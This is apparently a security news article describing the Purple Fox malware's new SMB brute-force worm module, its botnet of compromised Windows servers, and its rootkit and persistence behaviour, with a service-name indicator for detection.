Purple Fox is a well-known malware, that was previously distributed through exploit kits and phishing emails, and has now added a worm module allowing it to scan for and infect Windows systems. 

It started like a downloader malware, and afterward, it shifted to Windows PowerShell in order to deliver and retrieve malware, it comes with rootkit and backdoor capabilities, and it was first spotted in 2018 when it managed to infect more than 30,000 devices.

It seems like starting May 2020, the Purple Fox attacks have significantly intensified, reaching 90,000 attacks and gaining 600% more infections, according to security researchers, Amit Serper and Ophir Harpaz.

What devices are at risk?

An exposed Windows system was discovered when scanning for devices reachable over the Internet, and it seems that Purple Fox’s added worm module uses SMB password brute force to infect it.

Until now the malware has deployed its droppers and additional modules on a large network of bots holding around 2,000 compromised servers.

The devices included in the botnet are including Windows Server machines that are running the IIS version 7.5 and Microsoft FTP, and the servers that are using Microsoft RPC, Microsoft Server SQL Server 2008 R2, and Microsoft HTTPAPI httpd 2.0, and Microsoft Terminal Service.

Purple Fox’s worm-like behavior allows it to infect servers by using brute-forcing for infiltrating in vulnerable Internet-exposed SMB services, but it also keeps using phishing campaigns and web browser vulnerabilities to deploy its payloads.

Throughout our research, we have observed an infrastructure that appears to be made out of a hodge-podge of vulnerable and exploited servers hosting the initial payload of the malware, infected machines which are serving as nodes of those constantly worming campaigns, and server infrastructure that appears to be related to other malware campaigns.


How does the malware operate? 

Another interesting thing that Purple Fox does is also installing a rootkit module that is used for the hidden open-source rootkit in order to hide dropped files and folders or even Windows registry entries created on the infected systems. 

After the rootkit has been deployed and the device was rebooted, the malware will rename its DLL payload to match a Windows system DLL furthermore being able to configure it so it can be launched on system start.


From this point on the malware can be executed on system launch, meaning that each of the infected systems will have the same worm-like behavior, constantly scanning the Internet for other targets and trying to compromise them and in order to add them to the botnet.

As the machine responds to the SMB probe that’s being sent on port 445, it will try to authenticate to SMB by brute-forcing usernames and passwords or by trying to establish a null session.

If the authentication is successful, the malware will create a service whose name matches the regex AC0[0-9]{1} — e.g. AC01, AC02, AC05 (as mentioned before) that will download the MSI installation package from one of the many HTTP servers and thus will complete the infection loop.


All About Rootkits. Definition, Types, Detection, Prevention

Critical Vulnerabilities in Windows Leave Computers Exposed to New Attacks

Leave a Reply

Your email address will not be published. Required fields are marked *